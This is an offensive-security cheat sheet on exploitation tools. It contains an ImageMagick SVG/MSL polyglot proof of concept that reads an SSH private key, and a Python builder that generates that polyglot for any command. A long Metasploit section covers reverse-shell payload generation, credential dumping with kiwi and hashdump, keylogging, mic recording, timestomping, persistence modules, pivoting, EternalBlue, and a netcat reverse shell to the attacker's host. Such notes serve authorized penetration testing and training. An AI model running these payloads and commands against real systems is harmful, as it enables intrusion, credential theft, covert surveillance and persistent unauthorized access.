# Exploitation notes

## Exploitation Tools

* [Resources](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#Resources)

### Table of Contents

* [ImageTragick](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#ImageTragick)
* [MSL / Polyglot Attack](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#msl--polyglot-attack)
* [Metasploit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#Metasploit)
* [searchsploit](https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/08_exploitation_tools.md#searchsploit)

### Resources

| Name         | Description                                                                                                                                                      | URL                                              |
| ------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------ |
| Evil-WinRM   | The ultimate WinRM shell for hacking/pentesting                                                                                                                  | <https://github.com/Hackplayers/evil-winrm>      |
| Exploitalert | Listing of latest Exploits                                                                                                                                       | <https://exploitalert.com>                       |
| Metasploit   | Metasploit Framework                                                                                                                                             | <https://github.com/rapid7/metasploit-framework> |
| TheFatRat    | Exploitation tool that wraps a well-known payload into a binary; the compiled malware runs on Linux, Windows, Mac and Android.                                    | <https://github.com/Screetsec/TheFatRat>         |

### ImageTragick

> <https://imagetragick.com/>

### MSL / Polyglot Attack

> <https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html>

#### poc.svg

```c
<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>
```

#### Executing Payload

`convert` (or any ImageMagick consumer, here an upload directory the web application feeds to ImageMagick) reads `poc.svg` with the SVG coder, follows the `msl:poc.svg` reference into the MSL coder, and the MSL `<read filename="pdf:...">` with the `authenticate` attribute passes that value unescaped as the PDF password on the ghostscript delegate command line, where the backtick expression runs as the converting user. This needs a policy.xml that still allows the SVG, MSL and PDF coders and an ImageMagick build that predates the upstream fix that followed the November 2020 report.

```c
$ convert poc.svg poc.png
$ cp /tmp/poc.svg /var/www/html/convert_images/
```
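A builder for the polyglot above plus a check of the policy.xml it depends on, added here as an example; it is not code from the handbook or from the linked write-up. It assumes the exact file layout shown on the page (the `authenticate` value reaching the ghostscript delegate inside a double-quoted argument) and the stock policy.xml format of `<policy domain="coder" rights="none" pattern="MSL"/>` entries, brace lists included. The two policy.xml samples inside it are constructed for the example, not copied from any distribution.

```python
"""Builder and policy check for the ImageMagick SVG/MSL polyglot.
Added example, not code from the handbook or the cited blog post.
Assumptions: the page's polyglot layout, and policy.xml entries of the form
<policy domain="coder|delegate" rights="none" pattern="X"/> or pattern="{X,Y}"."""

import xml.etree.ElementTree as ET

# What the chain needs: SVG loads the file, the msl: URL hands it to MSL,
# the pdf: read calls the ghostscript delegate ("gs").
POLYGLOT_NEEDS = {"coder:SVG", "coder:MSL", "coder:PDF", "delegate:GS"}


def build_msl_polyglot(command: str, self_name: str = "poc.svg",
                       out_name: str = "test.png") -> str:
    """Return the SVG/MSL polyglot that runs `command` when ImageMagick
    processes the file saved under `self_name` (the msl: href must point
    at the file's own name, or the MSL half is never reached)."""
    # The attribute is single-quoted XML and ImageMagick places the value
    # inside a double-quoted shell argument: a stray ', " or ` ends one of
    # those contexts early, and < or & are illegal inside an XML attribute.
    bad = set("'\"`<&") & set(command)
    if bad:
        raise ValueError(f"characters that break the polyglot: {sorted(bad)}")
    payload = f'ff" `{command}`;"'
    doc = (
        f"<image authenticate='{payload}'>\n"
        '  <read filename="pdf:/etc/passwd"/>\n'
        '  <get width="base-width" height="base-height" />\n'
        '  <resize geometry="400x400" />\n'
        f'  <write filename="{out_name}" />\n'
        '  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" '
        'xmlns:xlink="http://www.w3.org/1999/xlink">\n'
        f'  <image xlink:href="msl:{self_name}" height="100" width="100"/>\n'
        "  </svg>\n"
        "</image>\n"
    )
    ET.fromstring(doc)  # both coders use libxml2; refuse to emit malformed XML
    return doc


def denied(policy_xml: str) -> set[str]:
    """Return 'domain:NAME' entries that a policy.xml denies outright."""
    out = set()
    for pol in ET.fromstring(policy_xml).iter("policy"):
        if pol.get("rights", "").strip().lower() != "none":
            continue
        domain = pol.get("domain", "").strip().lower()
        for name in pol.get("pattern", "").strip("{}").split(","):
            if name.strip():
                out.add(f"{domain}:{name.strip().upper()}")
    return out


def polyglot_viable(policy_xml: str) -> bool:
    """True when nothing the chain relies on is denied ('*' denies all coders)."""
    return not (({"coder:*"} | POLYGLOT_NEEDS) & denied(policy_xml))


# Constructed samples for the example (not any distribution's real file).
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
</policymap>"""

HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{EPHEMERAL,URL,HTTPS,MVG,MSL,TEXT,SHOW,WIN,PLT}"/>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}"/>
  <policy domain="delegate" rights="none" pattern="gs"/>
</policymap>"""


if __name__ == "__main__":
    print(build_msl_polyglot("id > /tmp/im_poc"))
    for label, pol in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        state = "viable" if polyglot_viable(pol) else "blocked by"
        print(label, state, sorted(POLYGLOT_NEEDS & denied(pol)))
```

On a target, `convert -list policy` (or the policy.xml under the path `convert -list configure` reports) gives the real input for `polyglot_viable`; the hardened sample shows the three independent places a defender can cut the chain (MSL, PDF, or the gs delegate).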

### Metasploit

> <https://github.com/rapid7/metasploit-framework>

> <https://github.com/rapid7/metasploit-payloads>

#### General Usage

```c
$ sudo msfdb init                  // create and initialize the database
$ sudo msfdb run                   // start the database and launch msfconsole
$ msfdb --use-defaults delete      // delete existing databases
$ msfdb --use-defaults init        // database initialization with default settings
$ msfdb status                     // database status
msf6 > workspace                   // metasploit workspaces
msf6 > workspace -a <WORKSPACE>    // add a workspace
msf6 > workspace -r <OLD> <NEW>    // rename a workspace
msf6 > workspace -d <WORKSPACE>    // delete a workspace
msf6 > workspace -D                // delete all workspaces
msf6 > db_nmap <OPTIONS>           // execute nmap and add output to database
msf6 > hosts                       // reads hosts from database
msf6 > services                    // reads services from database
msf6 > vulns                       // displaying vulnerabilities
msf6 > search                      // search within metasploit
msf6 > set RHOST <RHOST>           // set remote host
msf6 > set RPORT <RPORT>           // set remote port
msf6 > run                         // run exploit
msf6 > spool /PATH/TO/FILE         // recording screen output
msf6 > save                        // saves current state
msf6 > use exploit/<PATH>          // select an exploit module (same for auxiliary/, post/, payload/, encoder/, nop/)
msf6 > search type:<TYPE> <TERM>   // restrict a search to one module type: exploit, auxiliary, post, payload, encoder, nop
msf6 > sessions -l                 // list all current sessions
msf6 > sessions -i 1               // switch to session 1
msf6 > sessions -u <ID>            // upgrading shell to meterpreter
msf6 > sessions -k <ID>            // kill specific session
msf6 > sessions -K                 // kill all sessions
msf6 > jobs                        // showing all current jobs
msf6 > show payloads               // displaying available payloads
msf6 > set VERBOSE true            // enable verbose output
msf6 > set ForceExploit true       // run the exploit even if the check reports the target as not vulnerable
msf6 > set EXITFUNC thread         // payload exits its own thread instead of terminating the host process
msf6 > set AutoLoadStdapi false    // disables autoload of stdapi
msf6 > set PrependMigrate true     // enables automatic process migration
msf6 > set PrependMigrateProc explorer.exe                        // auto migrate to explorer.exe
msf6 > use post/PATH/TO/MODULE                                    // use post exploitation module
msf6 > use post/linux/gather/hashdump                             // use hashdump for Linux
msf6 > use post/multi/manage/shell_to_meterpreter                 // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload    // use a specific module
C:\> Ctrl + z                                    // background the active shell (a channel inside meterpreter, or a plain shell session)
meterpreter > load stdapi                        // load stdapi (only needed when AutoLoadStdapi is false)
meterpreter > background                         // put meterpreter in background (same as "bg")
meterpreter > shell                              // get a system shell (Ctrl + z backgrounds it as a channel)
meterpreter > channel -i <ID>                    // interact again with a backgrounded channel, e.g. that shell
meterpreter > ps                                 // list processes
meterpreter > migrate <PID>                      // migrate into another process
meterpreter > getuid                             // get the user id
meterpreter > sysinfo                            // get system information
meterpreter > search -f <FILE>                   // search for a file
meterpreter > upload                             // uploading local files to the target
meterpreter > ipconfig                           // get network configuration
meterpreter > load powershell                    // load the powershell extension
meterpreter > powershell_shell                   // interactive powershell prompt inside the session
meterpreter > powershell_execute <CMD>           // execute a single command
meterpreter > powershell_import <FILE>           // import a .ps1 script or .NET assembly
meterpreter > powershell_session_remove          // remove a powershell session
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress'                                // network discovery from the neighbour (ARP/ND) cache
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }'    // ping sweep; -TimeoutSeconds exists in PowerShell 7 only, drop it on Windows PowerShell 5.1
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded'                            // single-port check
meterpreter > load kiwi                          // load mimikatz
meterpreter > help kiwi                          // mimikatz help
meterpreter > kiwi_cmd                           // execute mimikatz native command
meterpreter > lsa_dump_sam                       // lsa sam dump
meterpreter > dcsync_ntlm krbtgt                 // dc sync
meterpreter > creds_all                          // dump all credentials
meterpreter > creds_msv                          // msv dump
meterpreter > creds_kerberos                     // kerberos dump
meterpreter > creds_ssp                          // ssp dump
meterpreter > creds_wdigest                      // wdigest dump
meterpreter > getprivs                           // enable all privileges the current token holds (core command, independent of kiwi)
meterpreter > getsystem                          // escalate to SYSTEM via named-pipe impersonation; needs a local admin or SeImpersonate token
meterpreter > hashdump                           // dump the SAM hashes (needs SYSTEM)
meterpreter > run post/windows/gather/checkvm    // detect whether the target is a virtual machine
meterpreter > run post/multi/recon/local_exploit_suggester    // checking for exploits
meterpreter > run post/windows/manage/enable_rdp              // enables rdp
meterpreter > run post/multi/manage/autoroute                 // runs autoroutes
msf6 > use auxiliary/server/socks_proxy                       // SOCKS proxy server (successor of socks4a); relays into subnets added with autoroute
meterpreter > keyscan_start                                   // start the keylogger
meterpreter > keyscan_dump                                    // dump the captured keystrokes
meterpreter > screenshare                                     // realtime screen sharing
meterpreter > screenshare -q 100                              // realtime screen sharing at quality 100
meterpreter > record_mic                                      // recording mic output
meterpreter > timestomp                                       // modify timestamps
meterpreter > execute -f calc.exe                             // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1    // port forwarding
```

#### Metasploit through Proxychains

```c
$ proxychains -q msfconsole
```

#### Meterpreter Listener

**Generate Payload**

```c
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe
```

**Setup Listener for Microsoft Windows**

```c
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
```

**Setup Listener for MacOS**

```c
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
```

**Download Files**

```c
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
```

```c
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
```

```c
C:\> .\<FILE>.exe
```

```c
meterpreter > download *
```

#### Enumeration

**SNMP Scan**

```c
msf6 > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_login) > run
```

**SNMP Enum**

```c
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_enum) > run
```

**Tomcat Enumeration**

```c
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
```

**Exploit Suggester**

```c
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run
```

#### Execute Binaries

**Port Forwarding with Chisel**

Starts a chisel client on the target (the binary has to be uploaded first) that opens a reverse SOCKS listener on port 1092 of the attacking host. The chisel server on `<LHOST>` must be running with `--reverse`, or the `R:` remote is refused; `-H` hides the window so the process survives without a console.

```c
meterpreter > execute -Hf chisel.exe -a "client -v <LHOST>:<LPORT> R:1092:socks"
```

#### Pivoting

**Port Forwarding with Meterpreter**

```c
meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>
```

**SOCKS Proxy on Meterpreter Sessions**

Runs from the `msf6` prompt, not inside meterpreter, and only relays traffic into subnets for which `autoroute` has already added a route through a session.

```c
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run -j
```

**Pivoting with Meterpreter**

```c
meterpreter > run autoroute -s <XXX.XXX.XXX>.0/24    // route the subnet through this session
meterpreter > background
msf6 > use auxiliary/scanner/portscan/tcp            // modules now reach the routed subnet
```

#### Auxiliary Handling

**Auxiliary Setup**

```c
msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run
```

**Auxiliary Output Directory**

```c
/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt
```

#### Persistence

**Setting up Persistent Access**

```c
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe
```

**Install via exploit/windows/local/persistence**

The module uploads and registers the payload itself; it needs a matching handler (same payload, LHOST and LPORT) listening before the autorun fires.

```c
msf6 > use exploit/windows/local/persistence
msf6 > set SESSION 1
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 > exploit
```

**Persistence through persistence_service**

```c
msf6 > use exploit/windows/local/persistence_service
msf6 > set session 2
msf6 > set lport 5678
msf6 > exploit
```

```c
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 5678
msf6 > exploit
```

**Persistence through persistence_exe**

`REXEPATH` is the binary to plant (for example the `shell.exe` built above); it must have been generated with the same payload and LPORT (here 1234) that the handler below uses.

```c
msf6 > use post/windows/manage/persistence_exe
msf6 > set session 1
msf6 > set rexepath /root/payload.exe
msf6 > exploit
```

```c
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 1234
msf6 > exploit
```

**Persistence through Registry**

```c
msf6 > use exploit/windows/local/registry_persistence
msf6 > set session 1
msf6 > set lport 7654
msf6 > exploit
```

```c
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 7654
msf6 > exploit
```

#### Exploit Handling

**WP Shell Upload**

```c
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS <RHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST <LHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT <LPORT>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
```

```c
meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > execute -f nc.exe -a "-e cmd.exe <LHOST> <LPORT>"
```

**Dedicated Exploit**

```c
msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST <LHOST>
msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter_reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit
```

**Additional Options**

```c
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT <LPORT>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <LHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <RHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
```

### searchsploit

```c
$ searchsploit <NAME>              // search by name / keyword
$ searchsploit --cve <CVE>         // search by CVE identifier
$ searchsploit -m <ID>             // mirror (copy) an exploit into the current directory
$ searchsploit -x <ID|PATH>        // examine an exploit by EDB-ID or by path
```
